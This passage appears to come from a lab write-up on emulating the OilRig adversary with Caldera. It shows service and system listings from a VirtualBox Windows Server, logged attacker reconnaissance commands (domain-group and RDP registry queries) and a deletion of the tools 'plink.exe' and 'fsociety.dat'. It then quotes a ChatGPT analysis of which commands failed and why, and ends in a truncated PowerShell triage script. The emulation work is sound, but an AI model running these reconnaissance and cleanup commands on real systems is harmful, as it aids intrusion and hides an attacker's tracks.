(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: DiagTrackDISPLAY_NAME: Connected User Experiences and Telemetry TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: DispBrokerDesktopSvcDISPLAY_NAME: Display Policy Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: DnscacheDISPLAY_NAME: DNS Client TYPE : 30 WIN32 STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: DPSDISPLAY_NAME: Diagnostic Policy Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: Elastic AgentDISPLAY_NAME: Elastic Agent TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: ElasticEndpointDISPLAY_NAME: Elastic Endpoint TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: EventLogDISPLAY_NAME: Windows Event Log TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: EventSystemDISPLAY_NAME: COM+ Event System TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: fdPHostDISPLAY_NAME: 
Function Discovery Provider Host TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: FDResPubDISPLAY_NAME: Function Discovery Resource Publication TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: FontCacheDISPLAY_NAME: Windows Font Cache Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: gpsvcDISPLAY_NAME: Group Policy Client TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: IKEEXTDISPLAY_NAME: IKE and AuthIP IPsec Keying Modules TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: iphlpsvcDISPLAY_NAME: IP Helper TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: KeyIsoDISPLAY_NAME: CNG Key Isolation TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: LanmanServerDISPLAY_NAME: Server TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: LanmanWorkstationDISPLAY_NAME: Workstation TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 
0x0SERVICE_NAME: lmhostsDISPLAY_NAME: TCP/IP NetBIOS Helper TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: LSMDISPLAY_NAME: Local Session Manager TYPE : 30 WIN32 STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: mpssvcDISPLAY_NAME: Windows Defender Firewall TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: MSDTCDISPLAY_NAME: Distributed Transaction Coordinator TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: NcbServiceDISPLAY_NAME: Network Connection Broker TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: netprofmDISPLAY_NAME: Network List Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: NlaSvcDISPLAY_NAME: Network Location Awareness TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: nsiDISPLAY_NAME: Network Store Interface Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: PcaSvcDISPLAY_NAME: Program Compatibility Assistant Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) 
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: PlugPlay
DISPLAY_NAME: Plug and Play
    TYPE : 20 WIN32_SHARE_PROCESS   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: PolicyAgent
DISPLAY_NAME: IPsec Policy Agent
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: Power
DISPLAY_NAME: Power
    TYPE : 20 WIN32_SHARE_PROCESS   STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: ProfSvc
DISPLAY_NAME: User Profile Service
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: RasMan
DISPLAY_NAME: Remote Access Connection Manager
    TYPE : 20 WIN32_SHARE_PROCESS   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: RpcEptMapper
DISPLAY_NAME: RPC Endpoint Mapper
    TYPE : 20 WIN32_SHARE_PROCESS   STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: RpcSs
DISPLAY_NAME: Remote Procedure Call (RPC)
    TYPE : 20 WIN32_SHARE_PROCESS   STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: SamSs
DISPLAY_NAME: Security Accounts Manager
    TYPE : 20 WIN32_SHARE_PROCESS   STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: Schedule
DISPLAY_NAME: Task Scheduler
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: SENS
DISPLAY_NAME: System Event Notification Service
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: ShellHWDetection
DISPLAY_NAME: Shell Hardware Detection
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: Spooler
DISPLAY_NAME: Print Spooler
    TYPE : 110 WIN32_OWN_PROCESS (interactive)   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: sshd
DISPLAY_NAME: OpenSSH SSH Server
    TYPE : 10 WIN32_OWN_PROCESS   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: SstpSvc
DISPLAY_NAME: Secure Socket Tunneling Protocol Service
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: StateRepository
DISPLAY_NAME: State Repository Service
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: StorSvc
DISPLAY_NAME: Storage Service
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: SysMain
DISPLAY_NAME: SysMain
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: Sysmon64
DISPLAY_NAME: Sysmon64
    TYPE : 10 WIN32_OWN_PROCESS   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: SystemEventsBroker
DISPLAY_NAME: System Events Broker
    TYPE : 20 WIN32_SHARE_PROCESS   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: TabletInputService
DISPLAY_NAME: Touch Keyboard and Handwriting Panel Service
    TYPE : 30 WIN32   STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: Themes
DISPLAY_NAME: Themes
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: TimeBrokerSvc
DISPLAY_NAME: Time Broker
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: TokenBroker
DISPLAY_NAME: Web Account Manager
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: TrkWks
DISPLAY_NAME: Distributed Link Tracking Client
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: UALSVC
DISPLAY_NAME: User Access Logging Service
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: UserManager
DISPLAY_NAME: User Manager
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: UsoSvc
DISPLAY_NAME: Update Orchestrator Service
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: VBoxService
DISPLAY_NAME: VirtualBox Guest Additions Service
    TYPE : 10 WIN32_OWN_PROCESS   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: W32Time
DISPLAY_NAME: Windows Time
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: Wcmsvc
DISPLAY_NAME: Windows Connection Manager
    TYPE : 10 WIN32_OWN_PROCESS   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: WinDefend
DISPLAY_NAME: Microsoft Defender Antivirus Service
    TYPE : 10 WIN32_OWN_PROCESS   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: WinHttpAutoProxySvc
DISPLAY_NAME: WinHTTP Web Proxy Auto-Discovery Service
    TYPE : 30 WIN32   STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: Winmgmt
DISPLAY_NAME: Windows Management Instrumentation
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: WinRM
DISPLAY_NAME: Windows Remote Management (WS-Management)
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: WLMS
DISPLAY_NAME: Windows Licensing Monitoring Service
    TYPE : 10 WIN32_OWN_PROCESS   STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: WpnService
DISPLAY_NAME: Windows Push Notifications System Service
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: wuauserv
DISPLAY_NAME: Windows Update
    TYPE : 30 WIN32   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: cbdhsvc_97674
DISPLAY_NAME: Clipboard User Service_97674
    TYPE : f0 ERROR   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: CDPUserSvc_97674
DISPLAY_NAME: Connected Devices Platform User Service_97674
    TYPE : f0 ERROR   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
SERVICE_NAME: WpnUserService_97674
DISPLAY_NAME: Windows Push Notifications User Service_97674
    TYPE : f0 ERROR   STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)
    WIN32_EXIT_CODE : 0 (0x0)   SERVICE_EXIT_CODE : 0 (0x0)   CHECKPOINT : 0x0   WAIT_HINT : 0x0
stderr:
exit code: 0
command: systeminfo
stdout: Host Name: WINDOWS-SERVER
OS Name: Microsoft Windows Server 2022 Standard Evaluation
OS Version: 10.0.20348 N/A Build 20348
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00454-40000-00001-AA626
Original Install Date: 10/15/2024, 2:49:41 AM
System Boot Time: 11/11/2024, 8:07:32 PM
System Manufacturer: innotek GmbH
System Model: VirtualBox
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
    [01]: Intel64 Family 6 Model 158 Stepping 10 GenuineIntel ~3549 Mhz
BIOS Version: innotek GmbH VirtualBox, 12/1/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+09:00) Seoul
Total Physical Memory: 6,144 MB
Available Physical Memory: 3,200 MB
Virtual Memory: Max Size: 7,168 MB
Virtual Memory: Available: 3,840 MB
Virtual Memory: In Use: 3,328 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\WINDOWS-SERVER
Hotfix(s): 3 Hotfix(s) Installed.
    [01]: KB5008882
    [02]: KB5011497
    [03]: KB5010523
Network Card(s): 1 NIC(s) Installed.
    [01]: Intel(R) PRO/1000 MT Network Connection
          Connection Name: Ethernet
          DHCP Enabled: No
          IP address(es)
          [01]: 192.168.1.21
          [02]: fe80::5588:53e8:2e27:9e65
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
stderr:
exit code: 0
command: reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
stdout:
stderr: ERROR: The system was unable to find the specified registry key or value.
exit code: 1
command: net group "SQL Admins" /domain
stdout: The request will be processed at a domain controller for domain WORKGROUP.
stderr: System error 1355 has occurred.
The specified domain either does not exist or could not be contacted.
exit code: 2
command: del C:\Users\gosta\AppData\Roaming\fsociety.dat C:\Users\Public\Downloads\plink.exe;
stdout:
stderr: The system cannot find the path specified.
exit code: 1
ChatGPT Recommendations to enable command execution
Prompt:
The attached file contains all the commands executed by the adversary "OilRig" in an operation in the caldera framework. It contains command, stdout, stderr, and exit_code. I am pretty sure you will be able to deduce which commands were successful and which were not. I also need your suggestions of what to do in the Windows Server 2022, where this sandcat agent is installed, to be able to run successfully all the commands.
Answer:
Based on the command results from the oilrig_windows_commands.txt, I can identify successful and failed command executions, along with recommendations for adjustments in your Windows Server 2022 environment to help ensure all commands execute correctly. Here's an analysis and troubleshooting plan:
- Successful Commands:
  - Basic System and Network Information: Commands like `cscript /nologo computername.vbs`, `hostname`, `whoami`, `ipconfig /all`, and `systeminfo` successfully gathered system information.
  - Access to User and Local Group Info: Commands `net user` and `net localgroup administrators` worked correctly, showing local users and admin groups.
  - Process and Service Listing: The `tasklist` and `sc query` commands ran successfully, displaying active processes and services.
- Failed Commands and Recommendations:
  - Domain-Specific Commands: Commands targeting domain accounts, such as `net user /domain`, `net group /domain`, `net group "domain admins" /domain`, `net group "Exchange Trusted Subsystem" /domain`, and `net accounts /domain`, failed with a System error 1355.
    Reason: This error typically indicates the system is not part of a Windows domain but rather configured as a standalone server in a WORKGROUP.
    Recommendation: If domain functionality is necessary for these commands, the Windows Server 2022 machine should be joined to an Active Directory (AD) domain. Otherwise, these commands will continue to fail because they rely on domain-specific account and group data that's unavailable in a WORKGROUP configuration.
  - Registry Query: The command `reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"` failed with ERROR: The system was unable to find the specified registry key or value.
    Reason: This error occurs when the specified registry key doesn't exist, which may be due to the absence of remote desktop connections or saved configurations under that registry path.
    Recommendation: Verify if remote desktop or terminal services configurations are saved in the registry. If not, this command will not yield results as expected.
  - File Deletion: The command `del C:\Users\gosta\AppData\Roaming\fsociety.dat C:\Users\Public\Downloads\plink.exe;` failed, showing The system cannot find the path specified.
    Reason: This error likely means the specified files, fsociety.dat and plink.exe, do not exist in the specified paths.
    Recommendation: Verify if these files were created or downloaded by prior actions. If they are not required for other steps, this deletion command might be unnecessary. Alternatively, check paths and filenames for accuracy.
  - Domain Group Check for "SQL Admins": The `net group "SQL Admins" /domain` command failed similarly due to System error 1355, as the machine isn't joined to a domain.
    Recommendation: This command requires domain membership. Without domain membership, this query can't return valid results, so it should be omitted unless the machine is added to a domain.
- Summary of Steps to Improve Command Execution:
  - Join to an Active Directory Domain (if required): Ensure the server is connected to a domain to support domain-specific commands. Alternatively, if domain-related reconnaissance isn't necessary, you can exclude these commands.
  - Verify File Existence and Paths: Before executing deletion commands, ensure the files exist. You can add conditional checks in scripts to avoid errors when files aren't present.
  - Review Registry Keys and Remote Desktop Configuration: If remote desktop-related keys are required, configure or use RDP sessions that populate these keys. Otherwise, accept that registry queries related to these settings will not yield data.
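The triage the prompt above asks for can be scripted instead of read by hand. The following PowerShell is an added example, not code from this page, from Caldera or from its emu plugin: it takes the records that the `jq` filter at the top of the page returns, splits them into successful and failed commands by exit code, and maps each failure's stderr to the host-side cause identified above. The field names (adversary, command, stdout, stderr, exit_code) are assumed from the prompt's description of the file; the five sample records are constructed from outputs shown on this page, with one record for a different adversary to show the filter.

```powershell
# Added example (not from the page or the Caldera project). Assumes the
# commands-output.json records carry the fields adversary, command, stdout,
# stderr and exit_code. The sample below is constructed from this page.
$sampleJson = @'
[
  {"adversary":"OilRig","command":"systeminfo",
   "stdout":"Host Name: WINDOWS-SERVER","stderr":"","exit_code":0},
  {"adversary":"OilRig","command":"reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"",
   "stdout":"","stderr":"ERROR: The system was unable to find the specified registry key or value.","exit_code":1},
  {"adversary":"OilRig","command":"net group \"SQL Admins\" /domain",
   "stdout":"The request will be processed at a domain controller for domain WORKGROUP.",
   "stderr":"System error 1355 has occurred.\r\nThe specified domain either does not exist or could not be contacted.","exit_code":2},
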